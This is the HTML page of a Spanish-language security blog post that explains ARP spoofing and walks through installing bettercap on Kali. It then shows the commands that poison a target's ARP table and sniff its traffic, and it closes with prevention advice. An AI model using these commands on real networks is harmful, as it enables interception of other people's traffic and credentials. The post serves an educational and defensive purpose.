<!DOCTYPE html>
<html lang="es">
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta name="color-scheme" content="light">
  <meta name="description" content="
Hoy quiero hablar acerca de arp spoofing, de bettercap: una gran herramienta bastante completa para la auditoría de redes, y por supuesto la importancia de con">
  <meta name="keywords" content="hacking, programación, tecnología, python, electrónica, Carlos Ganoza, ciberseguridad, coding, tutoriales de hacking, tutoriales de programación, django, django python, django-paranoid, pixmob hacking, pixmob-music-rhythm">
  <link rel="shortcut icon" href="/img/favicon.png">

  
    <meta name="description" content="Hoy quiero hablar acerca de arp spoofing, de bettercap: una gran herramienta bastante completa para la auditoría de redes, y por supuesto la importancia de conectarnos a internet a través de un canal">
<meta property="og:type" content="article">
<meta property="og:title" content="ARP spoofing con bettercap">
<meta property="og:url" content="http://carlosganoza.com/2020/07/05/arp-spoofing-con-bettercap/index.html">
<meta property="og:site_name" content="El blog de Carlos Ganoza">
<meta property="og:description" content="Hoy quiero hablar acerca de arp spoofing, de bettercap: una gran herramienta bastante completa para la auditoría de redes, y por supuesto la importancia de conectarnos a internet a través de un canal">
<meta property="og:locale" content="es_ES">
<meta property="og:image" content="http://carlosganoza.com/2020/07/05/arp-spoofing-con-bettercap/logo-bettercap.png">
<meta property="og:image" content="http://carlosganoza.com/2020/07/05/arp-spoofing-con-bettercap/mitm.png">
<meta property="og:image" content="http://carlosganoza.com/2020/07/05/arp-spoofing-con-bettercap/bettercap.png">
<meta property="og:image" content="http://carlosganoza.com/2020/07/05/arp-spoofing-con-bettercap/show.png">
<meta property="og:image" content="http://carlosganoza.com/2020/07/05/arp-spoofing-con-bettercap/arp-a.png">
<meta property="og:image" content="http://carlosganoza.com/2020/07/05/arp-spoofing-con-bettercap/trafico-web-sin-https.png">
<meta property="article:published_time" content="2020-07-06T04:26:24.000Z">
<meta property="article:modified_time" content="2022-11-30T19:48:21.000Z">
<meta property="article:author" content="Carlos Ganoza">
<meta property="article:tag" content="arp-spoofing">
<meta property="article:tag" content="bettercap">
<meta property="article:tag" content="hacking">
<meta property="article:tag" content="kali">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://carlosganoza.com/2020/07/05/arp-spoofing-con-bettercap/logo-bettercap.png">
  

  <title>
    ARP spoofing con bettercap — El blog de Carlos Ganoza
  </title>

  <link rel="canonical" href="http://carlosganoza.com/2020/07/05/arp-spoofing-con-bettercap/">

  <!-- Google Fonts -->
  <link rel="preconnect" href="https://fonts.googleapis.com">
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
  <link href="https://fonts.googleapis.com/css2?family=DM+Serif+Display:ital@0;1&family=DM+Sans:opsz,wght@9..40,400;9..40,500;9..40,600&family=JetBrains+Mono:wght@400;500&display=swap" rel="stylesheet">

  <!-- Theme CSS -->
  
<link rel="stylesheet" href="/css/blog.css">

<meta name="generator" content="Hexo 8.1.1"></head>

<body>
  

<div class="overlay" id="overlay" onclick="closeSidebar()"></div>

<aside class="sidebar" id="sidebar">
  <button class="sb-close" onclick="closeSidebar()" aria-label="Cerrar menú">✕</button>

  <div class="sb-profile">
    
    <div class="sb-avatar sb-avatar--photo" style="background-image:url('/img/carlos_ganoza.gif')"></div>
  
    <div class="sb-name">Carlos Ganoza</div>
    
    <div class="sb-role">blog about cybersecurity, engineering, computer science and other boring things.</div>
    
    
    <p class="sb-bio">Cybersecurity Manager and Security Specialist with 15+ years of experience in software engineering, cybersecurity, application security, risk management, offensive security, and ethical hacking. MSc in Cybersecurity,OWASP Chapter Leader, speaker, mentor, and open-source enthusiast focused on secure development, threat modeling, DevSecOps, and security culture.</p>
    
    <div class="sb-socials">
      
        <a href="https://twitter.com/drneox" class="sb-soc" target="_blank" rel="noopener noreferrer">Twitter</a>
      
      
        <a href="https://github.com/drneox" class="sb-soc" target="_blank" rel="noopener noreferrer">GitHub</a>
      
      
        <a href="https://www.linkedin.com/in/carlosganoza" class="sb-soc" target="_blank" rel="noopener noreferrer">LinkedIn</a>
      
      
        <a href="https://stackoverflow.com/users/2383148" class="sb-soc" target="_blank" rel="noopener noreferrer">Stack</a>
      
    </div>
  </div>

  <nav class="sb-nav">
    <div class="sb-group">
      <div class="sb-group-label">Navegación</div>
      <a class="sb-item" href="/es" onclick="closeSidebar()">
        <span class="sb-icon">⌂</span> Inicio
      </a>
      <a class="sb-item" href="/archives/" onclick="closeSidebar()">
        <span class="sb-icon">☰</span> Archivo
      </a>
    </div>

    
    
    <div class="sb-group">
      <div class="sb-group-label">Tags</div>
      
      <a class="sb-item" href="/tags/hacking/" onclick="closeSidebar()">
        <span class="sb-icon">#</span> hacking
      </a>
      
      <a class="sb-item" href="/tags/python/" onclick="closeSidebar()">
        <span class="sb-icon">#</span> python
      </a>
      
      <a class="sb-item" href="/tags/ai/" onclick="closeSidebar()">
        <span class="sb-icon">#</span> ai
      </a>
      
      <a class="sb-item" href="/tags/algorithms/" onclick="closeSidebar()">
        <span class="sb-icon">#</span> algorithms
      </a>
      
      <a class="sb-item" href="/tags/owasp/" onclick="closeSidebar()">
        <span class="sb-icon">#</span> owasp
      </a>
      
      <a class="sb-item" href="/tags/ekoparty/" onclick="closeSidebar()">
        <span class="sb-icon">#</span> ekoparty
      </a>
      
      <a class="sb-item" href="/tags/open-source/" onclick="closeSidebar()">
        <span class="sb-icon">#</span> open-source
      </a>
      
      <a class="sb-item" href="/tags/datastructure/" onclick="closeSidebar()">
        <span class="sb-icon">#</span> dataStructure
      </a>
      
    </div>
    

    <div class="sb-group">
      <div class="sb-group-label">Links</div>
      
      
      <a class="sb-item" href="https://github.com/drneox" target="_blank" rel="noopener noreferrer" onclick="closeSidebar()">
        <span class="sb-icon">↗</span> GitHub
      </a>
      
    </div>
  </nav>

  <div class="sb-foot">El blog de Carlos Ganoza</div>
</aside>

  

<header class="masthead">
  <button class="hamburger" id="hamburger" onclick="toggleSidebar()" aria-label="Abrir menú">
    <span></span><span></span><span></span>
  </button>

  <div class="brand">
    <a href="/">
      <span class="brand-name">carlosganoza<span class="dot">.com</span></span>
      
      <span class="brand-sub">blog about cybersecurity, engineering, computer science and other boring things.</span>
      
    </a>
  </div>

  <div class="mast-right">
    <!-- Language switch -->
    
      
    
    <a href="/archives/" class="btn-arch">Archivo</a>
  </div>
</header>


  <main>
    

<!-- ── POST HERO ── -->
<div class="post-hero" style="background-image:url('/2020/07/05/arp-spoofing-con-bettercap/logo-bettercap.png')">
  
  <div class="post-hero-badge">
    hacking · arp-spoofing
  </div>
  
  <div class="post-hero-title-block">
    <h1 class="post-hero-title">ARP spoofing con bettercap</h1>
  </div>
</div>

<!-- ── META BAR ── -->
<div class="post-meta-bar">
  <div class="author">
    <div class="author-avatar">CG</div>
    Carlos Ganoza
  </div>
  <span class="meta-sep">·</span>
  <span class="meta-chip">05 Jul, 2020</span>
  <span class="meta-sep">·</span>
  <span class="meta-chip">3 min</span>
  
  <span class="meta-sep">·</span>
  
  <a href="/tags/hacking/" class="meta-tag">hacking</a>
  
  <a href="/tags/arp-spoofing/" class="meta-tag">arp-spoofing</a>
  
  <a href="/tags/kali/" class="meta-tag">kali</a>
  
  <a href="/tags/bettercap/" class="meta-tag">bettercap</a>
  
  
</div>

<!-- ── POST LAYOUT (body + TOC aside) ── -->
<div class="post-layout">
  <article class="post-body">
    <p><img src="/2020/07/05/arp-spoofing-con-bettercap/logo-bettercap.png" alt></p>
<p>Hoy quiero hablar acerca de arp spoofing, de <strong>bettercap</strong>: una gran herramienta bastante completa para la auditoría de redes, y por supuesto la importancia de conectarnos a internet a través de un canal seguro (SSL/TLS).</p>
<h3 id="¿Que-es-ARP"><a href="#¿Que-es-ARP" class="headerlink" title="¿Qué es ARP?"></a>¿Qué es ARP?</h3><p>ARP o Address Resolution Protocol, es un protocolo responsable de encontrar una MAC asociada a una determinada dirección IP dentro de una red.</p>
<p>Es decir, en una red el dispositivo <strong>A</strong> hace un ARP request preguntando por la MAC de determinada IP (dispositivo <strong>B</strong>), con la finalidad de intercambiar información con este (enviar paquetes).</p>
<h5 id="Mas-o-menos-asi"><a href="#Mas-o-menos-asi" class="headerlink" title="Más o menos así:"></a>Más o menos así:</h5><p>El dispositivo <strong>A</strong> con dirección MAC <strong>aa-aa-aa-aa-aa-aa</strong> y con dirección IP <strong>bb.bb.bb.bb</strong> quiere contactar con el dispositivo que tenga la dirección IP <strong>cc.cc.cc.cc</strong> y requiere de la dirección MAC.</p>
<h5 id="Entonces-el-dispositivo-que-tenga-la-IP-bb-bb-bb-bb-respondera-algo-como"><a href="#Entonces-el-dispositivo-que-tenga-la-IP-bb-bb-bb-bb-respondera-algo-como" class="headerlink" title="Entonces el dispositivo que tenga la IP bb.bb.bb.bb responderá algo como:"></a>Entonces el dispositivo que tenga la IP bb.bb.bb.bb responderá algo como:</h5><p>Soy el dispositivo con IP <strong>bb.bb.bb.bb</strong> y mi MAC es <strong>dd-dd-dd-dd-dd-dd</strong>.</p>
<p>Lógicamente para evitar que se pregunte cada vez que sea necesario por esta información, los dispositivos la guardan en su tabla ARP, que es un caché que almacena la relación que hay entre MAC e IP’s.</p>
<h3 id="ARP-spoofing"><a href="#ARP-spoofing" class="headerlink" title="ARP spoofing:"></a>ARP spoofing:</h3><p>Pero ¿qué pasa si en lugar de que el equipo que responde a esa petición ARP con su dirección MAC, no es el dispositivo B, sino un equipo controlado por un atacante?.</p>
<p>Esto es exactamente lo que pasa con el ARP spoofing, un equipo suplanta a otro y recibe todos sus paquetes.</p>
<p>Lo que hace el atacante es suplantar al router/switch e interceptar todos los paquetes que un usuario intercambia con este al navegar por internet (lo que se conoce cómo MITM), lógicamente luego los reenviará al equipo legitimo y el usuario podría nunca sospechar.</p>
<p><img src="/2020/07/05/arp-spoofing-con-bettercap/mitm.png" alt></p>
<h3 id="Bettercap"><a href="#Bettercap" class="headerlink" title="Bettercap:"></a>Bettercap:</h3><p>Bettercap es un software que facilita toda esta labor de ARP spoofing, y es una gran alternativa al viejo Ettercap que ya muchos deben conocer.</p>
<p>Ademas de eso Bettercap entre otras cosas, incluye módulos para:</p>
<ul>
<li>Auditoria de dispositivos BLE.</li>
<li>Auditoria para dispositivos HID (teclados y mouses inalámbricos).</li>
</ul>
<p>Aunque su primera versión fue escrita en ruby, la actual (bettercap 2) está íntegramente escrita en Go y hasta cuenta con una UI web bastante amigable.</p>
<h3 id="ARP-spoofing-con-bettercap"><a href="#ARP-spoofing-con-bettercap" class="headerlink" title="ARP spoofing con bettercap:"></a>ARP spoofing con bettercap:</h3><p>Para esta prueba utilicé una maquina virtual en Kali.</p>
<h4 id="Instalacion"><a href="#Instalacion" class="headerlink" title="Instalación:"></a>Instalación:</h4><p>Para tener la ultima versión de bettercap, lo instalaremos desde su repositorio en github.</p>
<h5 id="1-Instalamos-go"><a href="#1-Instalamos-go" class="headerlink" title="1) Instalamos go:"></a>1) Instalamos go:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">apt-get install golang</span><br></pre></td></tr></table></figure>

<h5 id="2-Creamos-el-GOPATH"><a href="#2-Creamos-el-GOPATH" class="headerlink" title="2) Creamos el GOPATH:"></a>2) Creamos el GOPATH:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">export GOPATH=$HOME/go</span><br><span class="line">source ~/.bashrc</span><br></pre></td></tr></table></figure>

<h5 id="3-Instalamos-algunas-dependencias-mas"><a href="#3-Instalamos-algunas-dependencias-mas" class="headerlink" title="3) Instalamos algunas dependencias más:"></a>3) Instalamos algunas dependencias más:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">apt-get install libusb-1.0-0-dev</span><br><span class="line">apt-get install libnetfilter-queue-dev</span><br></pre></td></tr></table></figure>

<h5 id="4-Descargamos-bettercap-desde-su-repo"><a href="#4-Descargamos-bettercap-desde-su-repo" class="headerlink" title="4) Descargamos bettercap desde su repo:"></a>4) Descargamos bettercap desde su repo:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">go get -v github.com/bettercap/bettercap</span><br></pre></td></tr></table></figure>

<h5 id="5-Compilamos-las-fuentes"><a href="#5-Compilamos-las-fuentes" class="headerlink" title="5) Compilamos las fuentes:"></a>5) Compilamos las fuentes:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">cd $GOPATH/src/github.com/bettercap/bettercap</span><br><span class="line">make build</span><br><span class="line">sudo make install</span><br></pre></td></tr></table></figure>

<p>Si hemos seguido todos los pasos al escribir el comando:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bettercap</span><br></pre></td></tr></table></figure>

<p>esto nos abrirá su linea de comandos:<br><img src="/2020/07/05/arp-spoofing-con-bettercap/bettercap.png" alt></p>
<p>ahora escribiremos el comando</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net.probe on</span><br></pre></td></tr></table></figure>

<p>para que nos detecte todas los dispositivos conectados en red.</p>
<p>y ahora:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net.show</span><br></pre></td></tr></table></figure>

<p>para ver los equipos<br><img src="/2020/07/05/arp-spoofing-con-bettercap/show.png" alt></p>
<p>ahora seleccionamos el objetivo:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">set arp.spoof.target 192.xx.xx.xx</span><br></pre></td></tr></table></figure>

<p>y activamos el ataque:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">arp.spoof on</span><br><span class="line">net.sniff on</span><br></pre></td></tr></table></figure>

<p>a estas alturas en la maquina víctima ya debería tener las tablas ARP envenenadas. y si ejecutamos desde ahi el comando:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">arp -a</span><br></pre></td></tr></table></figure>

<p>veremos que hay al menos 2 IP distintas asociadas a la misma MAC, de hecho es<br>la IP de la puerta de enlace (router/switch):</p>
<p><img src="/2020/07/05/arp-spoofing-con-bettercap/arp-a.png" alt></p>
<p>y ahora <strong>net.sniff</strong> nos permitirá ver todo el trafico de la victima:</p>
<p><img src="/2020/07/05/arp-spoofing-con-bettercap/trafico-web-sin-https.png" alt></p>
<h3 id="Prevenir"><a href="#Prevenir" class="headerlink" title="Prevenir:"></a>Prevenir:</h3><p>Recordemos siempre navegar a través de <strong>HTTPS</strong>, pues de esta manera nuestro trafico viaja cifrado, tampoco debemos olvidar tener nuestro navegador siempre actualizado y por último siempre tener cuidado cuando nos conectamos a las redes de WIFI públicas, <strong>NUNCA</strong> deberíamos utilizarlas para acceder a nuestras cuentas de banco o algunas otras con información sensible.</p>

  </article>

  <aside class="post-aside">
    <div class="aside-label">Contenido</div>
    <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#%C2%BFQue-es-ARP"><span class="toc-text">¿Qué es ARP?</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ARP-spoofing"><span class="toc-text">ARP spoofing:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Bettercap"><span class="toc-text">Bettercap:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ARP-spoofing-con-bettercap"><span class="toc-text">ARP spoofing con bettercap:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Prevenir"><span class="toc-text">Prevenir:</span></a></li></ol>

    
    <div class="aside-label" style="margin-top: 28px;">Etiquetas</div>
    <div class="aside-tags">
      
      <a href="/tags/hacking/" class="aside-tag">hacking</a>
      
      <a href="/tags/arp-spoofing/" class="aside-tag">arp-spoofing</a>
      
      <a href="/tags/kali/" class="aside-tag">kali</a>
      
      <a href="/tags/bettercap/" class="aside-tag">bettercap</a>
      
    </div>
    
  </aside>
</div>

<!-- ── POST NAVIGATION ── -->
<div class="post-nav">
  
  <div class="pn-item">
    <a href="/2022/08/18/soft-delete-en-django-con-django-paranoid/">
      <span class="pn-dir">← Siguiente</span>
      <span class="pn-title">Soft delete en django con django-paranoid</span>
      
    </a>
  </div>
  

  
  <div class="pn-item pn-item--right">
    <a href="/2014/04/08/infeccion-de-routers-de-movistar/">
      <span class="pn-dir">Anterior →</span>
      <span class="pn-title">infección de routers de movistar</span>
      
    </a>
  </div>
  
</div>

<!-- ── COMMENTS ── -->

<section class="post-comments">
  <h3 class="comments-title">Comentarios</h3>
  <div id="disqus_thread"></div>
  <script>
    var disqus_shortname  = "carlosganoza";
    var disqus_identifier = "http://carlosganoza.com/2020/07/05/arp-spoofing-con-bettercap/";
    var disqus_url        = "http://carlosganoza.com/2020/07/05/arp-spoofing-con-bettercap/";
    (function() {
      var dsq = document.createElement('script');
      dsq.type = 'text/javascript'; dsq.async = true;
      dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
      (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
    })();
  </script>
  <noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
</section>


  </main>

  

  <script>
    function toggleSidebar() {
      var sb = document.getElementById('sidebar');
      var ov = document.getElementById('overlay');
      var hb = document.getElementById('hamburger');
      var isOpen = sb.classList.toggle('open');
      ov.classList.toggle('open');
      hb.classList.toggle('open');
      document.body.style.overflow = isOpen ? 'hidden' : '';
    }
    function closeSidebar() {
      document.getElementById('sidebar').classList.remove('open');
      document.getElementById('overlay').classList.remove('open');
      document.getElementById('hamburger').classList.remove('open');
      document.body.style.overflow = '';
    }
  </script>
</body>
</html>
